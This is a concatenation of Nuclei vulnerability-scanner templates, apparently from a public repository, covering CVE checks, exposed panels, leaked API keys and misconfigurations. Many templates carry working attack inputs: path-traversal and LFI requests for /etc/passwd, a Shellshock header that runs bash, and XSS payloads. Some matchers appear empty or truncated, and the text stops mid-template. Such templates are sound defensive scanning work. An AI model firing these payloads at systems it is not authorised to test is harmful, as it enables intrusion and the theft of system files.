oracle-ebs-bispgrapgh-file-read 2 | info: 3 | name: Oracle EBS Bispgraph File Access 4 | author: "Alfie Njeru (@emenalf) - https://the-infosec.com" 5 | severity: Critical 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/" 10 | 11 | matchers: 12 | - type: regex 13 | regex: 14 | - "root:[x*]:0:0:" 15 | part: body -------------------------------------------------------------------------------- /vulnerabilities/rce-shellshock-user-agent.yaml: -------------------------------------------------------------------------------- 1 | id: rce-user-agent-shell-shock 2 | 3 | info: 4 | name: Remote Code Execution Via (User-Agent) 5 | author: 0xelkomy 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | headers: 11 | User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" 12 | path: 13 | - "{{BaseURL}}/cgi-bin/status" 14 | matchers: 15 | - type: regex 16 | regex: 17 | - "root:[x*]:0:0" 18 | part: body 19 | -------------------------------------------------------------------------------- /dns/dead-host-with-cname.yaml: -------------------------------------------------------------------------------- 1 | id: dead-host-with-cname 2 | 3 | info: 4 | name: dead-host-with-cname 5 | author: pdnuclei - projectdiscovery.io 6 | severity: info 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 5 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "NXDOMAIN" 19 | 20 | - type: word 21 | words: 22 | - "IN\tCNAME" 23 | -------------------------------------------------------------------------------- /files/web-config.yaml: -------------------------------------------------------------------------------- 1 | id: web-config 2 | info: 3 | name: Web Config file 4 | author: Yash Anand @yashanand155 5 | severity: info 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}/web.config' 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - 17 | - 18 | condition: and 19 | 20 | - type: status 21 | status: 22 | - 200 -------------------------------------------------------------------------------- /security-misconfiguration/jira-unauthenticated-projects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projects 2 | 3 | info: 4 | name: Jira Unauthenticated Projects 5 | author: TechbrunchFR 6 | severity: Info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/rest/api/2/project?maxResults=100" 12 | matchers: 13 | - type: word 14 | words: 15 | - 'projects' 16 | - 'startAt' 17 | - 'maxResults' 18 | condition: and 19 | -------------------------------------------------------------------------------- /security-misconfiguration/rack-mini-profiler.yaml: -------------------------------------------------------------------------------- 1 | id: rack-mini-profiler 2 | 3 | info: 4 | name: rack-mini-profiler environmnet information discloure 5 | author: vzamanillo 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/?pp=env" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - "Rack Environment" 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /cves/CVE-2018-7490.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-7490 2 | 3 | info: 4 | name: uWSGI PHP Plugin Directory Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - "root:[x*]:0:0:" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-12314.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-12314 2 | 3 | info: 4 | name: Deltek Maconomy 2.2.5 LFIl 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - "root:[x*]:0:0:" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2020-2096.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-2096 2 | 3 | info: 4 | name: Jenkins Gitlab Hook XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2020-5284.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5284 2 | 3 | info: 4 | name: Next.js .next/ limited path traversal 5 | author: Harsh & Rahul 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/_next/static/../server/pages-manifest.json" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: regex 16 | regex: 17 | - '\{"/_app":".*?_app\.js"' 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /files/public-tomcat-instance.yaml: -------------------------------------------------------------------------------- 1 | id: public-tomcat-instance 2 | 3 | info: 4 | name: tomcat manager disclosure 5 | author: Ahmed Sherif 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/manager/html' 12 | - '{{BaseURL}}:8080/manager/html' 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - Apache Tomcat 18 | - type: status 19 | status: 20 | - 401 21 | -------------------------------------------------------------------------------- /security-misconfiguration/front-page-misconfig.yaml: -------------------------------------------------------------------------------- 1 | id: front-page-misconfig 2 | 3 | info: 4 | name: FrontPage configuration information discloure 5 | author: JTeles 6 | severity: info 7 | # Reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/_vti_inf.html" 13 | matchers: 14 | - type: size 15 | size: 16 | - 247 17 | -------------------------------------------------------------------------------- /vulnerabilities/wordpress-wordfence-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-wordfence-xss 2 | 3 | info: 4 | name: WordPress Wordfence 7.4.6 Cross Site Scripting 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/apc-info.yaml: -------------------------------------------------------------------------------- 1 | id: apcu-service 2 | 3 | info: 4 | name: APCu service information leakage 5 | author: koti2 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/apc/apc.php" 12 | - "{{BaseURL}}/apc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - "APCu Version Information" 17 | - "General Cache Information" 18 | - "Detailed Memory Usage and Fragmentation" 19 | condition: or 20 | -------------------------------------------------------------------------------- /technologies/jaspersoft-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Jaspersoft-detect 2 | 3 | info: 4 | name: Jaspersoft detected 5 | author: koti2 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/jasperserver/login.html?error=1" 12 | matchers: 13 | - type: word 14 | words: 15 | - "TIBCO Jaspersoft: Login" 16 | - "Could not login to JasperReports Server" 17 | - "About TIBCO JasperReports Server" 18 | condition: or 19 | -------------------------------------------------------------------------------- /panels/weave-scope-dashboard-detect.yaml: -------------------------------------------------------------------------------- 1 | id: weave-scope-dashboard-detect 2 | 3 | info: 4 | name: Weave Scope Dashboard 5 | author: e_schultze_ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Weave Scope" 17 | - "__WEAVEWORKS_CSRF_TOKEN" 18 | - "__CSRF_TOKEN_PLACEHOLDER__" 19 | condition: and 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2018-18069.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-18069 2 | 3 | info: 4 | name: Wordpress unauthenticated stored xss 5 | author: nadino 6 | severity: medium 7 | 8 | requests: 9 | - method: POST 10 | path: 11 | - "{{BaseURL}}/wp-admin/admin.php" 12 | body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\">" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-8982.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-8982 2 | info: 3 | name: Wavemaker Studio 6.6 LFI/SSRF 4 | author: madrobot 5 | severity: high 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd" 11 | matchers-condition: and 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /panels/atlassian-crowd-panel.yaml: -------------------------------------------------------------------------------- 1 | id: atlassian-crowd-panel 2 | info: 3 | name: Atlassian Crowd panel detect 4 | author: organiccrap 5 | severity: low 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/crowd/console/login.action' 10 | headers: 11 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 12 | matchers: 13 | - type: word 14 | words: 15 | - Atlassian Crowd - Login 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-2791.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-2791 2 | 3 | info: 4 | name: Oracle WebCenter Sites XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /vulnerabilities/moodle-filter-jmol-xss.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-filter-jmol-xss 2 | 3 | info: 4 | name: Moodle filter_jmol XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - '\"};alert(1337);//' 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-3799.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-3799 2 | info: 3 | name: Spring-Cloud-Config-Server Directory Traversal 4 | author: madrobot 5 | severity: high 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" 11 | matchers-condition: and 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - 'root:[x*]:0:0:' 19 | part: body 20 | -------------------------------------------------------------------------------- /files/docker-registry.yaml: -------------------------------------------------------------------------------- 1 | id: docker-registry 2 | 3 | info: 4 | name: Docker Registry Listing 5 | author: puzzlepeaches 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/v2/_catalog" 12 | redirects: true 13 | max-redirects: 1 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - '"repositories":' 19 | - type: word 20 | words: 21 | - "application/json" 22 | part: header 23 | -------------------------------------------------------------------------------- /vulnerabilities/discourse-xss.yaml: -------------------------------------------------------------------------------- 1 | id: Discourse XSS 2 | 3 | info: 4 | name: Discourse CMS XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\">' 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "" 20 | part: body 21 | -------------------------------------------------------------------------------- /dns/cname-service-detector.yaml: -------------------------------------------------------------------------------- 1 | id: cname-service-detector 2 | 3 | info: 4 | name: 3rd party service checker 5 | author: bauthard 6 | severity: info 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: CNAME 11 | class: inet 12 | recursion: true 13 | retries: 5 14 | matchers-condition: or 15 | matchers: 16 | - type: word 17 | name: zendesk 18 | words: 19 | - "zendesk.com" 20 | - type: word 21 | name: github 22 | words: 23 | - "github.io" 24 | -------------------------------------------------------------------------------- /cves/CVE-2019-19908.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-19908 2 | 3 | info: 4 | name: phpMyChat-Plus XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "" 20 | part: body 21 | -------------------------------------------------------------------------------- /panels/citrix-adc-gateway-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-adc-gateway-panel 2 | info: 3 | name: Citrix ADC Gateway detect 4 | author: organiccrap 5 | severity: low 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/logon/LogonPoint/index.html' 10 | - '{{BaseURL}}/logon/LogonPoint/custom.html' 11 | headers: 12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 13 | matchers: 14 | - type: word 15 | words: 16 | - _ctxstxt_CitrixCopyright 17 | -------------------------------------------------------------------------------- /panels/pulse-secure-panel.yaml: -------------------------------------------------------------------------------- 1 | id: pulse-secure-panel 2 | 3 | info: 4 | name: Pulse Secure VPN Panel 5 | author: bsysop 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" 12 | matchers-condition: or 13 | matchers: 14 | - type: word 15 | words: 16 | - "/dana-na/auth/welcome.cgi" 17 | part: header 18 | 19 | - type: word 20 | words: 21 | - "/dana-na/css/ds.css" 22 | part: body 23 | -------------------------------------------------------------------------------- /tokens/google-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: google-api-key 2 | 3 | info: 4 | name: Google API Key 5 | author: Swissky 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "AIza[0-9A-Za-z\\-_]{35}" 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - "AIza[0-9A-Za-z\\-_]{35}" 25 | -------------------------------------------------------------------------------- /vulnerabilities/eclipse-xss.yaml: -------------------------------------------------------------------------------- 1 | id: Eclipse XSS 2 | 3 | info: 4 | name: Eclipse Reflected XSS vulnerability 5 | author: pikpikcu 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/help/index.jsp?view=" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-8903.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-8903 2 | 3 | info: 4 | name: Totaljs - Unathenticated Directory Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "apache2.conf" 20 | part: body 21 | -------------------------------------------------------------------------------- /technologies/couchdb-detect.yaml: -------------------------------------------------------------------------------- 1 | id: couchdb-detect 2 | info: 3 | name: couchdb detection 4 | author: organiccrap 5 | severity: low 6 | # commonly runs on port 5984/http 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}/_all_dbs' 11 | headers: 12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 13 | matchers: 14 | - type: word 15 | words: 16 | - CouchDB/ 17 | - Erlang OTP/ 18 | part: header 19 | condition: and 20 | -------------------------------------------------------------------------------- /technologies/sap-netweaver-as-java-detect.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-as-java-detect 2 | 3 | info: 4 | name: SAP NetWeaver AS JAVA (LM Configuration Wizard) Detection 5 | author: dwisiswant0 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl" 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - "urn:CTCWebServiceSi" 17 | part: body 18 | - type: status 19 | status: 20 | - 200 -------------------------------------------------------------------------------- /cves/CVE-2018-11759.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-11759 2 | 3 | info: 4 | name: Apache Tomcat JK Status Manager Access 5 | author: Harsh Bothra 6 | severity: medium 7 | 8 | # Source:- https://github.com/immunIT/CVE-2018-11759 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/jkstatus' 14 | - '{{BaseURL}}/jkstatus;' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "JK Status Manager" 24 | -------------------------------------------------------------------------------- /cves/CVE-2018-5230.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-5230 2 | 3 | info: 4 | name: Atlassian Confluence Status-List XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "SRC=\"javascript:alert(1337)\">" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-17382.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-17382 2 | 3 | info: 4 | name: Zabbix Authentication Bypass 5 | author: Harsh Bothra 6 | severity: Critical 7 | # source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "Dashboard" 22 | -------------------------------------------------------------------------------- /vulnerabilities/moodle-filter-jmol-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-filter-jmol-lfi 2 | 3 | info: 4 | name: Moodle filter_jmol LFI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - "root:[x*]:0:0:" 20 | part: body 21 | -------------------------------------------------------------------------------- /vulnerabilities/nginx-module-vts-xss.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-module-vts-xss 2 | 3 | info: 4 | name: Nginx virtual host traffic status module XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | -------------------------------------------------------------------------------- /vulnerabilities/wems-enterprise-xss.yaml: -------------------------------------------------------------------------------- 1 | id: WEMS XSS 2 | 3 | info: 4 | name: WEMS Enterprise Manager XSS 5 | author: pikpikcu 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/guest/users/forgotten?email=">' 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - '">' 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2020-3187.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-3187 2 | 3 | # Reference: https://twitter.com/aboul3la/status/1286809567989575685 4 | 5 | info: 6 | name: CVE-2020-3187 7 | author: KareemSe1im 8 | severity: High 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/+CSCOE+/session_password.html" 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - webvpn 19 | - Webvpn 20 | part: header 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /cves/CVE-2020-3452.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-3452 2 | 3 | # Source: https://twitter.com/aboul3la/status/1286012324722155525 4 | 5 | info: 6 | name: CVE-2020-3452 7 | author: pdteam 8 | severity: medium 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" 14 | matchers: 15 | - type: word 16 | words: 17 | - "INTERNAL_PASSWORD_ENABLED" 18 | - "CONF_VIRTUAL_KEYBOARD" 19 | condition: and 20 | -------------------------------------------------------------------------------- /cves/CVE-2020-8115.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-8115 2 | 3 | info: 4 | name: Revive Adserver XSS 5 | author: madrobot & dwisiswant0 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | part: body 19 | regex: 20 | - (?mi)window\.location\.replace\(".*alert\(1337\) -------------------------------------------------------------------------------- /vulnerabilities/x-forwarded-host-injection.yaml: -------------------------------------------------------------------------------- 1 | id: host-header-injection 2 | 3 | info: 4 | name: Host Header Injection (x-forwarded-host) 5 | author: melbadry9 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | # MD5 hash of melbadry9 13 | X-Forwarded-Host: "0021e78f48fe6525798294b7711c6f72.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "0021e78f48fe6525798294b7711c6f72" 20 | -------------------------------------------------------------------------------- /files/elasticsearch.yaml: -------------------------------------------------------------------------------- 1 | id: elasticsearch 2 | 3 | info: 4 | name: ElasticSearch Information Disclosure 5 | author: Shine 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/_cat/indices?v' 12 | - '{{BaseURL}}:9200/_cat/indices?v' 13 | - '{{BaseURL}}/_all/_search' 14 | - '{{BaseURL}}:9200/_all/_search' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - '"took":' 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /cves/CVE-2019-19719.yaml: -------------------------------------------------------------------------------- 1 | id: Tableau Server XSS 2 | 3 | info: 4 | name: Tableau Server XSS 5 | author: pikpikcu 6 | severity: medium 7 | # https://nvd.nist.gov/vuln/detail/CVE-2019-19719 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/en/embeddedAuthRedirect.html?auth=javascript:alert(document.cookie)" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "javascript:alert(document.cookie)" 20 | part: body 21 | -------------------------------------------------------------------------------- /tokens/mailchimp-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-access-key-value 2 | 3 | info: 4 | name: Mailchimp API Value 5 | author: puzzlepeaches 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "[0-9a-f]{32}-us[0-9]{1,2}" 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - "[0-9a-f]{32}-us[0-9]{1,2}" 25 | -------------------------------------------------------------------------------- /files/jolokia.yaml: -------------------------------------------------------------------------------- 1 | id: jolokia-instance 2 | 3 | info: 4 | name: Jolokia Version Disclosure 5 | author: mavericknerd & dwisiswant0 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/jolokia/version' 12 | - '{{BaseURL}}:8080/jolokia/version' 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - '"timestamp":' 18 | - '"protocol":' 19 | - '"agent":' 20 | condition: and 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /cves/CVE-2019-5418.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-5418 2 | 3 | info: 4 | name: File Content Disclosure on Rails 5 | author: omarkurt 6 | severity: medium 7 | # reference: https://github.com/omarkurt/CVE-2019-5418 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | headers: 14 | Accept: ../../../../../../../../etc/passwd{{ 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0:" 23 | part: body 24 | -------------------------------------------------------------------------------- /cves/CVE-2018-20824.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-20824 2 | 3 | info: 4 | name: Atlassian Jira WallboardServlet XSS 5 | author: madrobot & dwisiswant0 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - (?mi)timeout:\salert\(document\.domain\) 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-14974.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-14974 2 | 3 | info: 4 | name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting 5 | author: madrobot 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "url = window.location.search.split(\"?desktop_url=\")[1]" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2020-5405.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5405 2 | 3 | info: 4 | name: Spring Cloud Directory Traversal 5 | author: Harsh Bothra 6 | severity: High 7 | 8 | # source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0:" 22 | part: body 23 | -------------------------------------------------------------------------------- /technologies/prometheus-exposed-panel.yaml: -------------------------------------------------------------------------------- 1 | id: prometheus-exposed-panel 2 | info: 3 | name: Prometheus.io exposed panel 4 | author: organiccrap 5 | severity: low 6 | # usually runs on port http/9090 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}/graph' 11 | - '{{BaseURL}}:9090/graph' 12 | headers: 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 14 | matchers: 15 | - type: word 16 | words: 17 | - Prometheus Time Series Collection and Processing Server 18 | -------------------------------------------------------------------------------- /cves/CVE-2018-19439.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-19439 2 | 3 | info: 4 | name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console 5 | author: madrobot & dwisiswant0 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>' " 35 | matchers: 36 | - type: regex 37 | regex: 38 | - "root:[x*]:0:0:" 39 | - "www-data" 40 | - "localhost" 41 | part: body 42 | 43 | -------------------------------------------------------------------------------- /cves/CVE-2020-6287.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-6287 2 | 3 | info: 4 | name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard) 5 | author: dwisiswant0 6 | severity: critical 7 | 8 | # Affected Versions: 7.30, 7.31, 7.40, 7.50 9 | 10 | # p.s: 11 | # > Don't forget to change the default credentials 12 | # > to create new admin in associated file: 13 